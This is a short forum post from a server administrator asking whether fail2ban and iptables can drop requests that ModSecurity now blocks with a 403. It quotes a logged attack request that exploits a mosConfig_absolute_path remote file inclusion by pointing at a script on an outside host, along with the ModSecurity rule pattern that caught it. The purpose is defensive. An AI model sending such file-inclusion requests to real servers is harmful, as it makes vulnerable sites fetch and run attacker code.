Hi BeNe,
that should also work via fail2ban ... but can't the regex be rewritten so that, instead of a 403, iptables does the blocking?
In other words, block log entries like these directly, without an error message first:
Code:
GET /?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.xxxxxxxxxx.tld
User-Agent: libwww-perl/5.808
--ba07427a-H--
Message: Access denied with code 403 (phase 2). Pattern match "(\\.\\./\\.\\.|/|(http|https|ftp)\\:/)" at ARGS:mosConfig_absolute_path. [id "390075"] [rev "1"] [msg "JITP: Generic mosConfig_absolute_path File Inclusion Vulnerability"] [severity "CRITICAL"]
Action: Intercepted (phase 2)
Producer: ModSecurity v2.1.1 (Apache 2.x)